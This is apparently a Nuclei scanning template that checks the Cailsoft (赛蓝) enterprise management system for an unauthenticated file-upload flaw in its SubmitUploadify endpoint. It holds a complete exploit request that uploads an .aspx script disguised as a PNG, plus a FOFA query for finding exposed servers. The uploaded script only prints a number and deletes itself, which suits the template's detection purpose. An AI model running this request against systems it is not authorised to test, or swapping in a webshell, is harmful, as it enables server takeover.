id: cailsoft-submituploadify-fileupload

info:
  name: 赛蓝企业管理系统 SubmitUploadify - File Upload
  author: qwtd
  severity: critical
  description: |
    赛蓝企业管理系统 /EHRModule/EHR_Holidays/SubmitUploadify 接口处存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    FilePath中的值为文件路径地址，上传为无害化文件，访问后会自动删除。
  metadata:
    fofa-query: body="www.cailsoft.com"||body="赛蓝企业管理系统"
  tags: 赛蓝企业管理系统

http:
  - raw:
      - |
        @timeout: 30s
        POST /EHRModule/EHR_Holidays/SubmitUploadify?FolderId=1&UserId=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2558.72 Safari/537.36
        Accept-Ldwk: bG91ZG9uZ3dlbmt1
        Content-Type: multipart/form-data;boundary=---------------------------142851345723692939351758052805
        Connection: close
        
        -----------------------------142851345723692939351758052805
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.aspx"
        Content-Type: image/png
        
        <%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
        -----------------------------142851345723692939351758052805--

    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NetworkFile"
          - "FolderId"
          - "FileName"
          - "FilePath"
        condition: and
      - type: status
        status:
          - 200
